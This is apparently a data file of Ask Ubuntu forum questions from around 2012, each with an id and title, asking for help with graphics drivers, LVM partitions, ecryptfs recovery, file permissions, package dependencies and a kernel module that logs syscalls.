8086:2d01 ] ( rev 05 ) ff:02.0 host bridge [ 0600 ] : intel corporation core processor qpi link 0 [ 8086:2d10 ] ( rev 05 ) ff:02.1 host bridge [ 0600 ] : intel corporation core processor qpi physical 0 [ 8086:2d11 ] ( rev 05 ) ff:02.2 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d12 ] ( rev 05 ) ff:02.3 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d13 ] ( rev 05 )
234513	how to improve performance by optimus for gt650m ?	this error occurs when i try to use the optirun command : $ optirun glxgears [ 39785.949467 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to assign any connected display devices to x screen 0 [ 39785.949560 ] [ error ] aborting because fallback start is disabled . we have the following error when we change nvidia-current to nouveau for driver of bumblebee.conf . [ 167.510941 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 167.511064 ] [ error ] aborting because fallback start is disabled . what should i do ? i am trying to get my gt650m and gtx680m with nvidia optimus to install successfully . currently optirun is not working . my system is w110er , geforce650m and ubuntu 12.10 . the first gpu is intel hd graphics 4000 : glxgears with inel hd graphics 4000 . 302 frames in 5.0 seconds = 60.259 fps glxgears with gtx 485m 75120 frams in 5.0 seconds = 15023.970 fps optirun is working now . is this good performance ? not use gt650m 301 frames in 5.0 seconds = 60.009 fps gt650m with optimus 4677 frames in 5.0 seconds = 935.319 fps gtx680m with optimus 10750 frames in 5.0 seconds =2149.977 fps i think it is not great performance . i would like to know how to install great performance such as gtx485m . performance of 'nbody ' cuda demo for gtx 485m is 250 gflops . performance of 'nbody ' cuda demo for gt 650m is 107 gflops . i am sad for low performance of gt650m . i am would like to know the differnce between nouveau , nvidia-current , nvidia-experimental and 310.19 . only gpu using nvidia-current driver is working . can i use nvidia-experimental or 310.19 driver for gt650m with nvidia optimus ? i ask you to help me . i would like to get advices .
234514	unable to resize lvm partition just after ubuntu install with 'use lvm ' option	during installation of ubuntu 12.10 x64 i checked the `` use lvm '' option . my partitions : /dev/sda1 , ext2 , mount : /boot , 243.00 mib , flag : boot /dev/sda2 , extended , 698.4 gib /dev/sda5 , lvm2 pv , mount : ubuntu , 698.4 gib , flag : lvm or better see a gparted screenshot ( am not allowed to post images ) i 've tried both with current system and a live usb ubuntu , but i ca n't do anything with the lvm partition : nor add a new subpartition , neither resize it . is there a way to shrink it so i can add more physical partitions ? or how do i add a new virtual subpartition to lvm ? ( no such menu option in gparted ) edit sudo pvs : pv vg fmt attr psize pfree /dev/sda5 ubuntu lvm2 a -- 698.39g 0 sudo vgs : vg # pv # lv # sn attr vsize vfree ubuntu 1 2 0 wz -- n- 698.39g 0 sudo lvs : lv vg attr lsize pool origin data % move log copy % convert root ubuntu -wi-ao -- 692.49g swap_1 ubuntu -wi-ao -- 5.91g
234515	installing driver for atheros ar8131	i am having the same trouble as others getting my atheros ar8131 ethernet card recognised by ubuntu 12.10 on my new hp pavillion p7-1449 pc . i found the same question where the answer suggested the following : download tarball compact-wireless-3.6.8-1-snpc run ./scripts/driver-select alx make sudo make install the problem is when i run the make command i get the following : make -c /lib/modules/3.5.0-21-generic/build m=/home/chris/downloads/compat-wireless-3.6.8-1-snpc modules make : *** /lib/modules/3.5.0-21-generic/build : no such file or directory . stop . make : *** [ modules ] error 2 found a link to an alternative patch file ( compat-wireless-2012-09-25-pc ) but then i get the similar error : make -c /lib/modules/3.5.0-21-generic/build m=/home/chris/desktop/compat-wireless-2012-09-25-pc modules make : *** /lib/modules/3.5.0-21-generic/build : no such file or directory . stop . make : *** [ modules ] error 2 any help you could provide would be greatly appreciated .
234518	something went wrong with driver update and now my screen is half the size	i 'm a student on winter break so am away from my backup drives and ca n't just do a fresh install or dd my old working hard drive back into the machine or anything . background ( if you want ) : i was having some stability problems ( which i still have n't figured out quite yet ) with qt creator : while trying to add a resource file to a new project , the thing would just insta-close on me . 10 min later i got an internal error message about unity which was n't all that big of a deal at the time because it was n't affecting anything else to m knowledge . i read around and heard of other people having similar problems with their unity and driver configurations and i was curious about gnome anyway so i tried the same thing in gnome and got the same result with qt creator so i figured it must be on the level of my drivers . the problem : i ran apt-get update and apt-get install nvidia-current , rebooted and got a funky setup ... the dock icons are the size of my thumb and everything is zoomed in to some size in the upper left-hand corner of my machine . also , about 2.5 inches on either size of the screen simply are n't being used . the change of screen does n't happen until the splash login screen . the ubuntu loading screen is just like my old screen used to be and is still good resolution . i have an nvidia geforce gt 640m card but am unsure about how to find any more information about it because 12.04 does n't seem to know what driver i am using or anything whenever i go into the system settings to look around . images : http : //imgur.com/lmjji.jpg ... my desktop screenshot http : //imgur.com/w9cff.jpg ... screenshot of reddit.com i 'm not sure why everything scaled the way it did or why i ca n't see half of my desktop anymore . most of my documents and things were below the visible screen window and i ca n't access them . none of the scaling that you see in the pictures has been done by me . needless to say the interface is really annoying and some programs do n't have a left-right scroll bar ... please help ! !
234520	does ubuntu provide extra fonts through a font package ?	is there a font-package the ubuntu ships out that has more fonts ?
234523	when can i safely unplug an external drive on 12.10 ?	i have browsed several answers ... but none seems to address my question . as reported in bug # 1067876 the options to `` safely remove '' an external drive is gone . no problem ! umount is sufficient for me . however , i can not recognize when it is safe to pull the usb plug out since the icon for the storage device does not disappear , and no notification is displayed . how can i know if it is safe to unplug the device ? how can i explain to my mother when it is safe to do so ? so i am looking for an easy solution ( as it is present in 12.04 ) .
234526	how do i run gparted as root ?	i installed gparted to use for partitioning my hard drive so ubuntu is my only os but when i tried to run gparted , it told me that i have to be root but i am root as far as i know how do i know for sure i have n't even signed on as guest because i am still setting stuff up most other apps ask for confirmation i type in my password and on i go but gparted does n't have that prompt how do i become root
234527	apt-get upgrade says sudo needs to be upgraded , is this correct ?	i have a ubuntu server running 10.04 - to be precise , ubuntu 10.04.4 lts according to lsb_release -a. i just ran sudo apt-get update and sudo apt-get upgrade and got this output : reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-generic linux-image-generic the following packages will be upgraded : sudo 1 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . need to get 328kb of archives . after this operation , 12.3kb disk space will be freed . do you want to continue [ y/n ] ? it seemed weird to me that only one package would need to be upgraded in a new version . i looked for a changelog on the ubuntu site and the most recent one is for the version i have , 10.04.4 , and makes no mention of sudo at all . is all correct here or is there something i should be worried about ?
234528	two different virtual desktops ( different x sessions ) on two monitors	i have two monitors and ati 34xx graphic card . ubuntu 12.04 . i 'd like to have two different desktops ( not virtual workspaces ) on these monitors . for example , when i work with left monitor ( desktop ) it would not affect right one ( when i press hot keys , switch virtual workspaces , etc ) . i run similar thing on 7.10 or something like that ( long time ago ) , but i ca n't remember how to do this now . another example , i have a unity wm on left monitor and tile manager awesome on right one . i tried to configure this option using amd control centre , but after reboot i got only i session , another monitor has just a grey background and very odd graphic , looked like no x session on it . thanks .
234536	data recovery after installation	i am new to linux . while installing i was being displayed with only 2 drives - primary and logical , i assigned few space from logical to linux but after installation my logical drive has gone/formatted . also i am not able to boot up in my primary drive which was having windows 7 on it . but i can see my windows 7 drive on linux . so guys please help me how to recover my data from my logical drives - i really need it , and i ams sure it has not been overwritten till now . also help me to boot up windows 7 , it boots but after that i face blue screen of death . so guys please suggest me data recovery software , as i am a student so can not afford to buy one . thanks
234541	symbolic links wont work	i 'm trying to move my .vimrc file into my .vim folder . i read that a symbolic link would allow vim to be able to find my .vimrc file . so i go , ln -s ~/.vim/.vimrc ~/.vimrc but all this seems to do is create a empty .vimrc file in my home folder ! ! what is going on ?
234543	grep : how to color 2 keywords ?	i know how to grep 2 keywords using 1 command , but i can only manage to color one of them in output . here is my command : grep 'keyword1 ' file.log | grep 'keyword2' only keyword2 is highlighted . how can i make keyword1 highlighted at the same time ?
234548	how do i pair with a bluetooth mouse via a usb dongle ?	i have a microsoft sculpt touch bluetooth mouse , and a bluetooth/usb dongle . i have tried to pair with the mouse by going to system settings > bluetooth and clicking on the `` + '' button to add a device . this launches the bluetooth new device setup wizard , which lists the mouse at the device search stage . i can only click `` continue '' on the wizard if i select a pin option ( or tell it not to use one ) . but i always just see : connecting to ' ( null ) ' ... ... followed by : setting up ' ( null ) ' failed . how do i connect to and use the mouse ? the dongle is listed by lsusb as : bus 005 device 002 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) after plugging it in , dmesg shows : [ 256.876091 ] usb 5-1 : new full-speed usb device number 2 using uhci_hcd [ 257.132851 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 257.135389 ] usbcore : registered new interface driver btusb i 'm using 12.04 with kernel 3.2.0-35-generic .
234551	permanent permission change to sys file	i 'd like to always give my user the permission to write on a specific file located in the /sys folder . this because in the solution i posted here i have the problem that every time i reboot i have to reset the permission on the file with chmod . i tried to follow this guide but it did n't work . according to this i have to create a sh script , mine consiste in just this line : /bin/chmod 644 /sys/class/leds/asus : :kbd_backlight/brightness thanks
234556	finger print driver for dell vostro 3460	where do i get the driver for finger print recognition for dell vostro 3460 and how can i use my fingerprint reader for login ? fingerprint reader : validity sensors , inc. vfs5011 fingerprint reader ( usb-id : 138a:0011 )
234559	i 'm having dependency problems with wine and multiarch on 12.04x64 . i need a solution	edit 3 : see bottom , for tl ; dr-ish version . i want to install wine1.5 , from the ppa : ubuntu-wine/ppa repository . fair enough right ? ( i 'm running 12.04 x64 and a custom kernel . ) i added their repository . works fine . i apt-get updated . ran fine . ( i did this with my repository commented out . sources.list is basically the default one minus extras , partner and deb-src entries ) root @ e330 : /home/nroach44/local/build/linux/src/3.5.7/linux-3.5.7 # apt-get install wine1.5 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . -- snip -- the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.20-0ubuntu1 ) e : unable to correct problems , you have held broken packages . okay then ... root @ e330 : /home/nroach44/local/build/linux/src/3.5.7/linux-3.5.7 # apt-get install wine1.5-i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . -- snip -- the following packages have unmet dependencies : wine1.5-i386 : i386 : depends : libgl1-mesa-glx : i386 but it is not going to be installed or libgl1 : i386 depends : libglu1-mesa : i386 but it is not going to be installed or libglu1 : i386 e : unable to correct problems , you have held broken packages . i follow that error message around a bit . root @ e330 : /home/nroach44/local/build/linux/src/3.5.7/linux-3.5.7 # apt-get install libgl1 : i386 reading package lists ... done building dependency tree reading state information ... done package libgl1 : i386 is a virtual package provided by : libgl1-mesa-swx11 : i386 8.0.4-0ubuntu0.2 libgl1-mesa-glx : i386 8.0.4-0ubuntu0.2 you should explicitly select one to install . e : package 'libgl1 : i386 ' has no installation candidate kept going ... root @ e330 : /home/nroach44/local/build/linux/src/3.5.7/linux-3.5.7 # apt-get install libgl1-mesa-glx : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . -- snip -- the following packages have unmet dependencies : libgl1-mesa-glx : i386 : depends : libdrm2 : i386 ( > = 2.3.1 ) but it is not going to be installed recommends : libgl1-mesa-dri : i386 ( > = 7.2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . this is getting a little old ... root @ e330 : /home/nroach44/local/build/linux/src/3.5.7/linux-3.5.7 # apt-get install libdrm2 : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . -- snip -- the following packages have unmet dependencies : openssh-client : depends : adduser ( > = 3.10 ) but it is not going to be installed depends : passwd openssh-server : depends : upstart-job depends : adduser ( > = 3.9 ) but it is not going to be installed depends : procps e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . root @ e330 : /home/nroach44/local/build/linux/src/3.5.7/linux-3.5.7 # apt-get install openssh-client openssh-server reading package lists ... done building dependency tree reading state information ... done openssh-client is already the newest version . openssh-server is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i do have a local repository where i copy the archives in my /var/cache/apt/archives folder and generate an index using them . i use this to update this machine and the three other machines in the house , rather than downloading the packages multiple times . this archive is not signed , and results in `` do you want to install these unsigned packages ? '' also , a fairly large amount of packages are listed in synaptic 's `` installed ( manual ) '' list . could this be related to the issue ? edit : i also tried some fairly common `` fix apt-get '' techniques : root @ e330 : /home/nroach44/local/build/linux/src/3.5.7/linux-3.5.7 # apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ e330 : /home/nroach44/local/build/linux/src/3.5.7/linux-3.5.7 # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ e330 : /home/nroach44/local/build/linux/src/3.5.7/linux-3.5.7 # apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . edit 2 : /var/log/dist-upgrade/ was empty . /var/log/apt/ contained no relevant information . also , dpkg -- get-selections | grep hold does n't return anything . edit 3 : after two re-installs , it appears that kernel-package conflicts with wine . on a fresh installation : root @ e330 : ~ # apt-get install wine kernel-package -- standard apt-get loading stuff -- some packages could not be installed blah blah the following have unmet dependencies : kernel-package : depends : po-debconf but it is not going to be installed `` '' : gettext `` '' '' '' '' '' the thing that annoys me is that i have these two installed on my desktop , and everything works fine .
234561	graphic equalization	is there a pulseaudio graphic equalizer for 12.04 ? if so , what must be done to configure it ? and where do i change/set color graphics for the screen monitor ? i just installed 12.04 and am having great difficulties finding and configuring apps/settings . the color on monitor is faded/washed out .
234567	ecryptfs assistance , have all keys am able to progress to decrypting the data but then aborts	please help have been trying for over 3-4 days now with various methods . i have created a folder named 'oldhome in my /tmp directory and also have all the encrypted data in a folder there . i deleted my old user with the encrypted files but kept all of the data and have cleared the keyring prior to this method as was unable to log into the old user for an unknown reason , i believe it was because i used root terminal on recovery to reset my password as this was the first thing i completed to log in as it had been such a long time , this had not worked , i have re-created the user but not attempted to copy the home directory into this because before when using it i was having this same problem with the password and attempted to copy the home folder which caused me to lose any remaining space on the separate home partition . below is the method i have taken in terminal used from https : //help.ubuntu.com/community/encryptedprivatedirectory # recovering_your_data_manually , using both the manual method first then the automatic method in live cd mode . i also have a problem copying the encrypted files over to an external hdd getting a read write error : - ubuntu @ ubuntu : ~ $ sudo ecryptfs-recover-private info : searching for encrypted private directories ( this might take a while ) ... info : found [ /media/718910c2-d11e-4617-867e-d0ae0425e9e7/.ecryptfs/username_bak/.private ] . try to recover this directory ? [ y/n ] : y info : found your wrapped-passphrase do you know your login passphrase ? [ y/n ] n info : to recover this directory , you must have your original mount passphrase . info : when you first setup your encrypted private directory , you were told to record info : your mount passphrase . info : it should be 32 characters long , consisting of [ 0-9 ] and [ a-f ] . enter your mount passphrase : info : success ! private data mounted read-only at [ /tmp/ecryptfs.hjjxsj63 ] . ubuntu @ ubuntu : ~ $ sudo apt-get install nautilus reading package lists ... done building dependency tree reading state information ... done suggested packages : gnome-sushi the following packages will be upgraded : nautilus 1 upgraded , 0 newly installed , 0 to remove and 276 not upgraded . need to get 845 kb of archives . after this operation , 0 b of additional disk space will be used . get:1 http : //archive.ubuntu.com/ubuntu/ precise-updates/main nautilus i386 1:3.4.2-0ubuntu5 [ 845 kb ] fetched 845 kb in 4s ( 197 kb/s ) ( reading database ... 148708 files and directories currently installed . ) preparing to replace nautilus 1:3.4.2-0ubuntu4 ( using ... /nautilus_1 % 3a3.4.2-0ubuntu5_i386.deb ) ... unpacking replacement nautilus ... processing triggers for libglib2.0-0 ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... setting up nautilus ( 1:3.4.2-0ubuntu5 ) ... ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00072328 device boot start end blocks id system /dev/sda1 * 2048 58595797 29296875 83 linux /dev/sda2 58597374 488396799 214899713 5 extended /dev/sda5 484741120 488396799 1827840 82 linux swap / solaris /dev/sda6 58597376 242917375 92160000 83 linux /dev/sda7 478715904 484726783 3005440 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 1021 mb , 1021313024 bytes 15 heads , 46 sectors/track , 2890 cylinders , total 1994752 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 240 1994751 997256 6 fat16 disk /dev/sdc : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc51d19ca device boot start end blocks id system /dev/sdc1 2048 234438655 117218304 7 hpfs/ntfs/exfat ubuntu @ ubuntu : ~ $ sudo mount -o remount , ro /dev/sda6 ubuntu @ ubuntu : ~ $ sudo mount -o remount , ro /dev/sda1 ubuntu @ ubuntu : ~ $ sudo find / -type d -iname '.private ' 2 > /dev/null /media/718910c2-d11e-4617-867e-d0ae0425e9e7/.ecryptfs/username_bak/.private ubuntu @ ubuntu : ~ $ sudo ecryptfs-add-passphrase -- fnek passphrase : inserted auth tok with sig [ xxxxxxxxxxxxxxxx ] into the user session keyring inserted auth tok with sig [ xxxxxxxxxxxxxxxx ] into the user session keyring ubuntu @ ubuntu : ~ $ sudo mount -t ecryptfs /media/718910c2-d11e-4617-867e-d0ae0425e9e7/.ecryptfs/username_bak/.private /media/c26296ba-cd38-450e-ae66-194d96cb27af/tmp/oldhome passphrase : select cipher : 1 ) aes : blocksize = 16 ; min keysize = 16 ; max keysize = 32 ( loaded ) 2 ) des3_ede : blocksize = 8 ; min keysize = 24 ; max keysize = 24 ( not loaded ) 3 ) cast6 : blocksize = 16 ; min keysize = 16 ; max keysize = 32 ( not loaded ) 4 ) cast5 : blocksize = 8 ; min keysize = 5 ; max keysize = 16 ( not loaded ) selection [ aes ] : aes select key bytes : 1 ) 16 2 ) 32 3 ) 24 selection [ 16 ] : 16 enable plaintext passthrough ( y/n ) [ n ] : n enable filename encryption ( y/n ) [ n ] : y filename encryption key ( fnek ) signature [ xxxxxxxxxxxxxxxx ] : [ xxxxxxxxxxxxxxxx ] attempting to mount with the following options : ecryptfs_unlink_sigs ecryptfs_fnek_sig= [ xxxxxxxxxxxxxxxx ] ecryptfs_key_bytes=16 ecryptfs_cipher=aes ecryptfs_sig=xxxxxxxxxxxxxxxx warning : based on the contents of [ /root/.ecryptfs/sig-cache.txt ] , it looks like you have never mounted with this key before . this could mean that you have typed your passphrase wrong . would you like to proceed with the mount ( yes/no ) ? : y would you like to proceed with the mount ( yes/no ) ? : y would you like to proceed with the mount ( yes/no ) ? : y would you like to proceed with the mount ( yes/no ) ? : y would you like to proceed with the mount ( yes/no ) ? : y aborting mount . ubuntu @ ubuntu : ~ $ < -- - then back to this prompt
234570	just installed 12.10 but cant find disk utility	i just installed 12.10 , but ca n't find the disk utility . disk utility show as installed . i even uninstalled and reinstalled it , but still ca n't find . the best i can find is disks , almost but no testing features .
234573	show all windows for certain program without panning out	if you have multiple windows of one program and you click the icon twice in the launcher , it will pan out and show all the windows of the program . here 's my issue . sometimes i have many windows of a program open and resized so that they sit next to each other , but i 'll have to click on another window for some reason and when i click the program 's icon – to return to it – in the launcher , it only gives me whatever window i used last , and if i click it twice , i get this huge , laggy , panning animation , which i do n't need . is there something else i can do ? like click it and show me all instances ( or windows ) of the program at once immediately , like in windows ?
234574	touchpad acting erratic in 12.10	i have a fresh-ish install of 12.10 and the touchpad has been acting strangely . first it 's ignoring some of my settings , for example , i usually turn off the `` enable mouse clicks with touchpad '' setting because i accidentally `` click '' when i do n't want to . second , the touchpad will occasionally go into a state where it jumps all over the screen and is completely unusable . when it 's in this state i have to rmmod and reload the psmouse driver , i 've done this a lot . looking back at my shell command history i see it done ten times in the past day or so . it seems that this happens most often when i have a my thumb on the touchpad and i click the mouse button . so i 'm wondering how can i first of all disable the mouse clicks feature and second , any ideas why it 's going into this jumpy state ?
234575	ca n't send file to smartphone via bluetooth in lubuntu ?	i 'm a new lubuntu user ( never used any linux os before ) . file manager -- > preferences -- > bluetooth manager i ca n't seem to send a file to my smartphone . i click the bluetooth icon on the task bar , a window comes up showing my smartphone . clicked `` pair '' to pair my laptop and smartphone . once paired , the send file button is activated , meaning i can already send a file . so i choose a 36mb .mp4 file , then send , then : request timeout error occurred while sending file video.mp4 first i thought it was because i 'm using a custom rom on my smartphone . but i switched to windows 7 and was able to send the same file with no problem whatsoever . any ideas ?
234576	can not update ubuntu 12.10	i can not update ubuntu 12.10 tried update and upgrade dpkg was interrupted , you must manually run sudo dpkg -- configure -a to correct the problem . sorry can not post image
234583	how can i reset the permissions of /var ?	my friend did a chmod -r 777 /var by mistake . now he has his /var folder permissions like this : drwxr-xr-x 15 root root 4096 dec 29 17:36 . drwxr-xr-x 23 root root 4096 dec 10 11:15 .. drwxrwxrwx 2 root root 4096 dec 28 09:54 backups drwxrwxrwx 22 root root 4096 nov 9 11:06 cache drwxrwsrwx 2 root whoopsie 4096 dec 31 09:38 crash drwxrwxrwx 2 root root 4096 apr 23 2012 games drwxrwxrwx 62 root root 4096 dec 10 11:06 lib drwxrwsrwx 2 root staff 4096 apr 19 2012 local lrwxrwxrwx 1 root root 9 dec 29 17:36 lock - > /run/lock drwxrwxrwx 19 root root 4096 dec 31 09:54 log drwxrwsrwx 2 root mail 4096 apr 23 2012 mail drwxrwxrwx 2 root root 4096 apr 23 2012 opt lrwxrwxrwx 1 root root 4 dec 29 17:36 run - > /run drwxrwxrwx 10 root root 4096 jun 29 2012 spool drwxrwxrwx 2 root root 4096 dec 31 10:03 tmp drwxrwsrwx 15 noufal www-data 4096 dec 28 10:59 www and i have mine as : drwxr-xr-x 15 root root 4096 dec 29 18:16 . drwxr-xr-x 24 root root 4096 dec 18 10:03 .. drwxr-xr-x 2 root root 4096 dec 31 10:00 backups drwxr-xr-x 24 root root 4096 nov 7 15:03 cache drwxrwsrwt 2 root whoopsie 4096 dec 31 09:55 crash drwxr-xr-x 2 root root 4096 apr 23 2012 games drwxr-xr-x 74 root root 4096 dec 29 17:30 lib drwxrwsr-x 2 root staff 4096 apr 19 2012 local lrwxrwxrwx 1 root root 9 dec 29 18:16 lock - > /run/lock drwxr-xr-x 23 root root 4096 dec 31 10:00 log drwxrwsr-x 2 root mail 4096 dec 31 10:39 mail drwxr-xr-x 2 root root 4096 apr 23 2012 opt lrwxrwxrwx 1 root root 4 dec 29 18:16 run - > /run drwxr-xr-x 10 root root 4096 jun 22 2012 spool drwxrwxrwt 6 root root 4096 dec 31 10:49 tmp drwxrws -- - 31 saji www-data 4096 nov 27 15:05 www we have similar systems . how can i reset the /var files and folders permission to the initial state , by not doing it individually for a file/folder .
234584	computer crashes under linux live cd but not windows 7	hi for a while i have been struggling with trying to get linux running on my computer , ( specifically ubuntu 12.04 but have also failed with other distributions such as mint , sabayon and opensuse ) i have tried the various boot parameters i have seen given as advice such as nomodeset noacpi etc.. pretty much tried all of them alone and in combinations ... the computer will boot into linux from the livecd but allways within 1 to 2 minutes , my monitor will go black and the monitor will flash analog/digital in the upper corner then say it is entering sleep mode , which is what it does when it does not have a signal.. like if i was to turn it on with the computer off ... . the computer power light stays on when it does this , and i see no error messages or warnings before hand ... . i also seem to have this problem when running programs that load before the operating system ... such as trying to run memtest86 off a usbstick to see if that might point out any problems ... or the `` chkdsk '' program to check for hard disk errors that runs during bootup in windows.. same thing as when i boot into linux where it will run for a minute or two then screen will go black.. at first i figured maybe video card drivers but i do n't think this is it as i should at least be able to load if i force it to use something like the standard vesa driver or using the nomodeset parameter etc if it was i believe ? is this correct ? and i dont think i would be getting the error running things like memtest86 etc if it was ... the thing is for whatever reason the computer does not do this at all under windows 7 , i am able to boot into that and have the computer run reasonably stable ... i am stumped as to what the problem is and would greatly appreciate any help ! ! system is as follows : processor : intel core 2 4400 at 2.0 ghz memory : 2.0 gb ddr2 harddisk : 500 gb ( unknown brand , comes up as `` wdc wd500 ... ... ... ... . '' in windows device manager so i guess western digital ) video card : ati radeon 4800 series ( think it is a 4850 to be exact ) monitor : samsung syncmaster 960bf once again any help is greatly appreciated , im lost as to why this runs fine under windows but seems to crash elsewhere , thanks -- -- edited in response to nroach44 - 12/31/12 2:22 am est nroach thanks for attempting to help ! - i tried launching a terminal with ctrl+alt+f1 as you suggested and am unable to do so , monitor still just displays that its going to sleep . i tried typing `` beep '' ( not sure if this command is installed on the livecd ? ) after attempting to launch a terminal to see it would activate the system speaker , to try to help determine if the computer was totally crashed , or monitor just not recieving a signal or stuck in sleep mode , and was not able to activate the speaker so i am assuming the system is crashed ... but again not sure if that terminal command exists on the livecd or not to begin with . any further help greatly appreciated ! - chris .
234585	will my epson stylustx121 printer work in ubuntu ?	i installed ubuntu in my pc just weeks ago.i printer used to work in windows 7 ultimate 32 bit version ( which i was using ) . but now my windows 7 does n't boot and i 'm also not able to use my printer . model name : epson stylus tx121 should i install some other software ? or what should i do ?
234589	not able to count character string in a particular column using countif in libreoffic calc	i have sheet that looks like this column a column b column c column d emp id location name function ehgik gurgaon rahul sales ehghh noida jeevan sales ehjhl gurgaon prakash marketing lkhre delhi sundar it i am trying to calculate the no . of users that belong to location `` gurgaon '' using countif . have tried using countif cell range that include all cells or only location column cells and criteria as `` gurgaon '' but the formula does n't return the count . the same formula however works fine when counting names using `` rahul '' as criteria returns '1 '' and the same with any function name such `` sales '' . but the count does not return any value other than '0 '' whenever i select any of the location names such as gurgaon or noida or emp id using `` '' double quotes . ca n't understand why ?
234593	ubuntu 12.10 boot issues	so i installed ubuntu 12.10 64 bit in a new partition alongside windows 7 in my laptop with a swap partition and whenever i boot i see the grub boot screen where i can select windows or ubuntu . now the trouble comes if i select to boot ubuntu then the computer takes me to a purple screen and i hear the ubuntu drum noise , but there is no login screen and i ca n't access the terminal . i need to do a hard reboot . the weird thing is that if i let grub auto select ubuntu ( let the counter go to zero ) then ubuntu will boot just fine . so the issue might be with grub . i also have an issue with closing my laptop while running ubuntu ; it does not recover after i open the laptop and all i see is a black screen . my hopes is that this issue will be solved with the above . any help would be appreciated , thanks . additional info : i have an ati discreet graphics card
234594	installing java on ubuntu 64 bit	i have ubuntu 12.04 lts version 64 bit . what is the procedure for installing and running java for development purpose . i am new to linux and unix platform . thanks in advance
234596	connecting and refreshing a wireless network without restart	after i set up my wireless network , i had to restart my computer before it would connect . i have talked to/read comments by , several other ubuntu users who had to do the same thing . why does this happen , and is there a way to connect a wireless network without a restart ? are we all just noobs and missing something obvious ? i already understand the driver install process , but i just do n't see why a restart seems to be necessary so often .
234602	how can i restore grub after switching from windows 8 to 7 on a dual boot ?	i formerly had windows 7 without ubuntu . now i upgraded it to windows 8..then i installed ubuntu 12.10 with live disk . after installing it runs ok and i see a dual boot option in grub menu . now sometimes i log in to windows 8 for some tasks . after some days i find windows 8 not interesting and i want to reinstall windows 7 ... now to do that i have to boot windows 7 disc from my dvd drive just like before.. my problem is if i want to reinstall windows it will not again show the grub menu and will directly go the windows desktop ... so how can i get back that boot option menu ( grub ) to log in to ubuntu after reinstalling windows ?
234603	how do i deal with 'sudoers.so must be only be writable by owner ' ?	whenever i try to install or remove something using terminal it gives the following error message : bluebird @ bluebird : ~ $ sudo apt-get update sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins bluebird @ bluebird : ~ $ sudo apt-get remove vlc sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins bluebird @ bluebird : ~ $ sudo apt-get install apt-file sudo : /usr/lib/sudo/sudoers.so must be only be writable by owner sudo : fatal error , unable to load plugins
234604	is it possible to search for files on all partitions at the same time ?	on ubuntu , is there any way to search for files on multiple hard disk partitions at once ? i 'd like to search the contents of all of my hard disk partitions at the same time , including my windows partition and my ubuntu partition .
234607	how to change network configurations , in my case , i want to change gateway ip address	my name is kamunge , i am trying to make changes for the gateway and have tried all the ways including deleting all the wired connections since its static and restarting the computer having the ethernet cable plugged out of the machine , and after writing route -n on the terminal its still showing me the former gateway configurations even not having reconfigured again . please help ! ! !
234608	ubuntu 12.04 with stable nvidia drivers is causing system to become unresponsive and screen to start flickering	installed ubuntu 10.04 lts and then upgraded to 12.04 lts and then installed the nvidia drivers ( stable ) and then ran ubuntu software center to install qt creator causing system to become unresponsive and screen to start flickering . looks like i 'm going to have to reboot . has anyone experienced a similar issue ? not sure if this is related to the following issue - https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/993187
234610	how to get userid when writing linux kernel module	here is my function in my kernel module which i insert using insmod command after make at later stages . i am working on goldfish ( 2.6.29 ) asmlinkage long our_sys_read ( unsigned int fd , char *buf , size_t count ) { printk ( `` -- -- -- - > > our_sys_read getuid ( ) -- -- -- -- -- % d\n '' , getuid ( ) ) ; return original_call_read ( fd , buf , count ) ; } i want to trap system calls and find out which user made these system calls . but when i run 'make ' , it throws me following error . /home/mohsin/lkm/trapcall.c:245 : error : implicit declaration of function 'getuid' any suggestion would be appreciated .
